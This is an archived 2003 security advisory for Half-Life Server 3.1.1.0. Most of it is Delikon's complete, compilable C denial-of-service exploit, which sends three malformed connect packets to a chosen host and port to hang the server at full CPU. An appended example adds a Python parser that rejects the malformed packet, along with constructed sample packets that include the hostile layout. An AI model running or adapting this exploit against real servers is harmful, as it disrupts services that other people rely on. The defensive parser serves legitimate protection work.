SECURITYVULNS:DOC:4416
Apr 22, 2003

[EXPL] Half-Life Exploit Code Released (Malformed Packet)

vulners.com

The following security advisory is sent to the securiteam mailing list, and can be found at the
SecuriTeam web site: http://www.securiteam.com


Half-Life Exploit Code Released (Malformed Packet)

SUMMARY

A vulnerability in Half-Life allows an attacker to cause the server to no
longer respond to legitimate requests by sending it malformed packets. The
following exploit code can be used to test your Half-Life installation for
the vulnerability.

DETAILS

Vulnerable systems:

  • Half-Life Server 3.1.1.0 (Windows and Linux)

Exploit:
/*
This is a Denial-of-service exploit (if you can call this an exploit)
against half-life-servers (without WON-authentication).
I have tested this successfully against half-life servers Exe version
3.1.1.0 under SuSE Linux 7.3 and win2k: after sending 3 specially formed
connect packets the server is unresponsive and uses 100% CPU power.
This is only a fast hack, it's a result of playing around with the
sourcecodes from http://www.pivx.com/luigi/. And the malformed packet is a
result of a coding accident.
"Even a blind hen sometimes finds a grain" special thanks to
[email protected].
I have this code successfully compiled with vc++.
With some hits on your keyboard, you can compile it under Linux too, but I
have no time.

Have fun with this lame code. P.S. you must link it with
WS2_32.lib!!!

Delikon/5.4.03/[email protected]/www.delikon.de

-----------------Binary-----------
at www.delikon.de

----------problem description-----
Mail me or look at the arrow which shows you the problem

---------patch--------------------
Hope that the half-life coders have time to code one, but I think this
has time till the next version of halflife, because this is not a serious
bug (only servers without WON-authentication can be crashed)

P.S. Half-Life coders: the bug is somewhere in the
SV_CheckForDuplicateNames() function

*/
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>

int startWinsock(void)
{
WSADATA wsa;
return WSAStartup(MAKEWORD(2,0),&wsa);
}

int main(int argc, char *argv[])
{
long rc;
SOCKET s,s2,s3,s4;
SOCKADDR_IN addr;
SOCKADDR_IN remoteAddr;
char buf[256];
char challenge[256];
int remoteAddrLen=sizeof(SOCKADDR_IN);
char *connect1a;

char get[]="\xff"
"\xff\xff\xff\x67\x65\x74\x63\x68\x61\x6c"
"\x6c\x65\x6e\x67\x65\x0a\x00";

char head[]="\xff"
"\xff\xff\xff\x63\x6f\x6e\x6e\x65\x63\x74"
"\x20\x34\x36\x20";

char connect1 []= "\x20"
"\x22\x5c\x70\x72\x6f\x74"
"\x5c\x32\x5c\x75\x6e\x69\x71\x75\x65\x5c"
"\x2d\x31\x5c\x72\x61\x77\x5c"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41"
"\x22" // <-- the problem: this extra quote breaks the quoted-argument layout
"\x22\x20\x22\x5c\x6d\x6f\x64"
"\x65\x6c\x5c\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x5c\x74\x6f\x70"
"\x63\x6f\x6c\x6f\x72\x5c\x31\x32\x38\x5c"
"\x62\x6f\x74\x74\x6f\x6d\x63\x6f\x6c\x6f"
"\x72\x5c\x31\x32\x38\x5c\x72\x61\x74\x65"
"\x5c\x39\x39\x39\x39\x2e\x30\x30\x30\x30"
"\x30\x30\x5c\x63\x6c\x5f\x75\x70\x64\x61"
"\x74\x65\x72\x61\x74\x65\x5c\x32\x30\x5c"
"\x63\x6c\x5f\x6c\x77\x5c\x31\x5c\x63\x6c"
"\x5f\x6c\x63\x5c\x31\x5c\x63\x6c\x5f\x64"
"\x6c\x6d\x61\x78\x5c\x31\x32\x38\x5c\x68"
"\x75\x64\x5f\x63\x6c\x61\x73\x73\x61\x75"
"\x74\x6f\x6b\x69\x6c\x6c\x5c\x31\x5c\x6e"
"\x61\x6d\x65\x5c\x74\x65\x73\x74\x22\x0a";

/* strlen() on an uninitialised buffer is undefined; clear the whole arrays */
memset(buf,0,sizeof(buf));
memset(challenge,0,sizeof(challenge));

if (argc<3)
{
printf("\n%s <Remote host> <Remote port>\n", argv[0]);
exit(1);
}

else
{
printf("Denial-of-Service exploit against half-life servers version 3.1.1.0\n");
printf("Found and coded by Delikon | 7.4.03 | www.delikon.de | [email protected] \n");

}

rc=startWinsock();

if(rc!=0)

{

printf("Error : startWinsock, error code: %d\n",rc);
return 1;

}

s=socket(AF_INET,SOCK_DGRAM,0);

if(s==INVALID_SOCKET)
{
printf("Error: couldn't create the socket , error code: %d\n",WSAGetLastError());
return 1;
}

addr.sin_family=AF_INET;

addr.sin_addr.s_addr =inet_addr(argv[1]);
addr.sin_port=htons(atoi(argv[2]));

rc=sendto(s,get,strlen(get),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
if(rc==SOCKET_ERROR)
{
printf("Fehler: sendto, fehler code: %d\n",WSAGetLastError());
return 1;
}
/* leave room for a terminator: recvfrom() does not NUL-terminate the data */
rc=recvfrom(s,buf,sizeof(buf)-1,0,(SOCKADDR*)&remoteAddr,&remoteAddrLen);
if(rc==SOCKET_ERROR || rc<17)
{
/* need at least the 14 header bytes plus the 3 trailing bytes stripped below */
printf("Error: recvfrom, error code: %d\n",WSAGetLastError());
return 1;
}
buf[rc]='\0';

strcpy(challenge,buf+14);
challenge[strlen(challenge)-3]='\0';
printf("Challenge:%s\n",challenge);
closesocket(s);

connect1a=(char *)malloc(sizeof(head)+sizeof(challenge)+sizeof(connect1));
if(connect1a==NULL)
{
printf("Error: malloc failed\n");
return 1;
}
strcpy(connect1a,head);
strcat(connect1a,challenge);
strcat(connect1a,connect1);

s2=socket(AF_INET,SOCK_DGRAM,0);

rc=sendto(s2,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
Sleep(120);
closesocket(s2);

s3=socket(AF_INET,SOCK_DGRAM,0);

rc=sendto(s3,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
Sleep(120);
closesocket(s3);

s4=socket(AF_INET,SOCK_DGRAM,0);

rc=sendto(s4,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
Sleep(120);
closesocket(s4);

printf("\n\n Server is down!!! ??? or ?? check it ;-)\n\n");

exit(1);
}
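Added example, not from the advisory or Delikon's code: a bounded, quote-aware parser that a server or an inline filter could run on a connect datagram before any name handling, rejecting the extra-quote layout the exploit sends. The packet format (four 0xff bytes, then connect <protocol> <challenge> "<protinfo>" "<userinfo>", with backslash-delimited info strings) is reconstructed from the hex strings above; the five-token rule, the size bounds and the requirement for a non-empty name key are this example's own assumptions, not Valve's actual validation logic.

```python
# Added example: defensive parser for GoldSrc-style "connect" packets.
# Not part of the SecuriTeam advisory, Delikon's exploit, or Valve's code.
# Packet layout reconstructed from the exploit's hex strings; the limits and
# the 5-token rule below are assumptions made for this example.
import re

MAX_TOKENS = 8     # assumption: a connect line never needs more than 5 tokens
MAX_PAIRS = 64     # assumption: upper bound on \key\value pairs per info string
MAX_FIELD = 255    # assumption: upper bound on the length of one key or value

OOB_HEADER = b"\xff\xff\xff\xff"   # four 0xff bytes prefix out-of-band commands


def tokenize(line):
    """Split a command line into tokens, honouring double quotes.

    Returns (tokens, malformed). malformed is True when a quote is never
    closed or a token is followed directly by more text instead of a
    separator (the extra quote the exploit inserts after the raw field).
    Every loop is bounded by the input length or MAX_TOKENS, so no input
    can make the tokenizer spin.
    """
    tokens, malformed = [], False
    i, n = 0, len(line)
    while i < n and len(tokens) <= MAX_TOKENS:
        while i < n and line[i].isspace():
            i += 1
        if i >= n:
            break
        if line[i] == '"':
            j = line.find('"', i + 1)
            if j < 0:
                return tokens, True            # opening quote never closed
            tokens.append(line[i + 1:j])
            i = j + 1
        else:
            j = i
            while j < n and not line[j].isspace() and line[j] != '"':
                j += 1
            tokens.append(line[i:j])
            i = j
        if i < n and not line[i].isspace():
            malformed = True                   # token glued to the next one
    return tokens, malformed


def parse_info(info):
    """Parse a \\key\\value\\key\\value string into a dict; raise if malformed."""
    if not info.startswith("\\"):
        raise ValueError("info string must start with a backslash")
    parts = info.split("\\")[1:]
    if len(parts) % 2 or len(parts) // 2 > MAX_PAIRS:
        raise ValueError("odd number of fields or too many pairs")
    pairs = {}
    for key, value in zip(parts[0::2], parts[1::2]):
        if not key or len(key) > MAX_FIELD or len(value) > MAX_FIELD:
            raise ValueError("empty key or oversized field")
        pairs[key] = value
    return pairs


def check_connect(packet):
    """Return (ok, reason) for one UDP datagram presented as a connect packet."""
    if not packet.startswith(OOB_HEADER):
        return False, "missing OOB header"
    try:
        line = packet[len(OOB_HEADER):].split(b"\n", 1)[0].decode("ascii")
    except UnicodeDecodeError:
        return False, "non-ASCII payload"
    tokens, malformed = tokenize(line)
    if malformed:
        return False, "unterminated or glued quote"
    if len(tokens) != 5 or tokens[0] != "connect":
        return False, "expected: connect <proto> <challenge> <protinfo> <userinfo>"
    if not tokens[1].isdigit() or not re.fullmatch(r"-?\d+", tokens[2]):
        return False, "protocol or challenge is not numeric"
    try:
        parse_info(tokens[3])
        userinfo = parse_info(tokens[4])
    except ValueError as exc:
        return False, "bad info string: %s" % exc
    if not userinfo.get("name"):
        return False, "userinfo carries no player name"
    return True, "ok"


# Constructed samples, not captured traffic; the challenge value 12345 is made up.
_PROTINFO = b"\\prot\\2\\unique\\-1\\raw\\" + b"A" * 32
GOOD_CONNECT = (OOB_HEADER + b"connect 46 12345 \"" + _PROTINFO + b"\" "
                b"\"\\model\\gordon\\topcolor\\128\\name\\test\"\n")
# Same layout as the exploit's packet: one extra quote right after the raw field.
MALFORMED_CONNECT = (OOB_HEADER + b"connect 46 12345 \"" + _PROTINFO + b"\"\" "
                     b"\"\\model\\" + b"A" * 83 + b"\\topcolor\\128\\bottomcolor\\128"
                     b"\\rate\\9999.000000\\cl_updaterate\\20\\cl_lw\\1\\cl_lc\\1"
                     b"\\cl_dlmax\\128\\hud_classautokill\\1\\name\\test\"\n")

if __name__ == "__main__":
    for label, pkt in (("good", GOOD_CONNECT), ("malformed", MALFORMED_CONNECT)):
        print(label, check_connect(pkt))
```

The design point is that every loop in the tokenizer and info-string parser terminates on the input length or a fixed constant, and a datagram that fails any structural check is refused before it reaches name handling, which is where the advisory places the server's spin. The same check is cheap enough to run in a UDP filter in front of a server that cannot be patched.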

ADDITIONAL INFORMATION

The information has been provided by <mailto:[email protected]> Delikon.
